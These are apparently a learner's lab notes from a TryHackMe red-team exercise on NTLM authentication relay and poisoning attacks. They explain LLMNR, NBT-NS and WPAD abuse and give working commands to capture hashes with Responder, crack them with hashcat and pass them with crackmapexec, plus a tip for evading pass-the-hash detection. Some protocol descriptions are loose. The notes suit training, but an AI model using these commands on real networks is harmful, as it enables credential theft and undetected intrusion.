General
Authentication relays are a type of cyber attack in which an attacker intercepts and modifies authentication requests in order to gain unauthorized access to a system. This type of attack can be exploited by using a tool such as Responder, which is a network utility that is designed to capture and modify authentication requests.
To carry out an authentication relay attack, the attacker first sets up a rogue server and then captures authentication requests that are sent to the legitimate server. The attacker can then modify the authentication requests and send them back to the legitimate server, using the Responder tool to intercept and modify the requests as needed. If the legitimate server is configured to trust the rogue server, it may accept the modified authentication requests and grant the attacker access to the system.
More information Responder is a network utility that can be used to capture and modify SMB (Server Message Block) authentication requests in order to carry out SMB relay attacks. In an SMB relay attack, the attacker captures SMB authentication requests that are sent to a legitimate SMB server and modifies them in order to gain unauthorized access to the server. The attacker can use Responder to intercept and modify the authentication requests as needed in order to trick the legitimate SMB server into granting access. ㅤ LLMNR is a protocol that allows computers on a local network to resolve the hostnames of other computers using multicast DNS. This protocol can be exploited by attackers to perform various types of attacks, such as spoofing the hostname of a legitimate server and tricking clients into connecting to a rogue server. ㅤ NBT-NS is a protocol that is used to resolve NetBIOS names to IP addresses on a local network. This protocol can be exploited by attackers to perform various types of attacks, such as spoofing the NetBIOS name of a legitimate server and tricking clients into connecting to a rogue server. ㅤ WPAD is a protocol that allows clients to automatically discover and use a proxy server on a local network. This protocol can be exploited by attackers to perform various types of attacks, such as redirecting client traffic to a rogue proxy server in order to capture sensitive information.
Commands
Intercepting NetNTLM with Responder
sudo responder -I INTERFACE
Results
[+] Listening for events...
[SMBv2] NTLMv2-SSP Client : <Client IP>
[SMBv2] NTLMv2-SSP Username : ZA\<Service Account Username>
[SMBv2] NTLMv2-SSP Hash : <Service Account Username>::ZA:<NTLMv2-SSP Hash>
2 Options with the hash you have recover
- Crack the Hash
- Pass the Hash (Authentification)
Crack Hash (Hashcat)
hashcat -m 5600 <hash file> <password file> --force
Pass the Hash
crackmapexec smb IP -u USERNAME -H 32196B56FFE6F45E294117B91A83BF38 -x WIN_COMMAND
Extra --> Force Authentification to be made via NTLM
Question: Is there a difference between dir \\za.tryhackme.com\SYSVOL
and dir \\<DC IP>\SYSVOL
and why the big fuss about DNS?
ㅤ
There is quite a difference, and it boils down to the authentication method being used. When we provide the hostname, network authentication will attempt first to perform Kerberos authentication. Since Kerberos authentication uses hostnames embedded in the tickets, if we provide the IP instead, we can force the authentication type to be NTLM. While on the surface, this does not matter to us right now, it is good to understand these slight differences since they can allow you to remain more stealthy during a Red team assessment. In some instances, organisations will be monitoring for OverPass- and Pass-The-Hash Attacks. Forcing NTLM authentication is a good trick to have in the book to avoid detection in these cases.